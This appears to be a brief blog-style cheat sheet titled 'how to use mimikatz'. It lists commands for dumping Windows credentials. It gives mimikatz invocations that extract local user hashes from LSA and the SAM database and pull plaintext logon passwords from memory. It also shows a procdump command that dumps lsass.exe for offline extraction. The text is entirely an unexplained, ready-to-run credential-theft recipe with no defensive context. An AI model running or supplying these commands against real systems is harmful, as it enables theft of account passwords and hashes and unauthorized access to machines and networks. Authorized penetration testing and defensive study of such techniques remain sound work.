(1) Get Local User’s Hash
privilege::debug
lsadump::lsa /inject
(2) Get memory password
privilege::debug
sekurlsa::logonPasswords
(3) use lsass.dmp to crack password
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords full” exit
(4) ExportLocalUsersHash
mimikatz.exe “privilege::debug” “token::elevate” “lsadump::sam” exit
how to use mimikatz ?
最新推荐文章于 2024-05-11 15:00:00 发布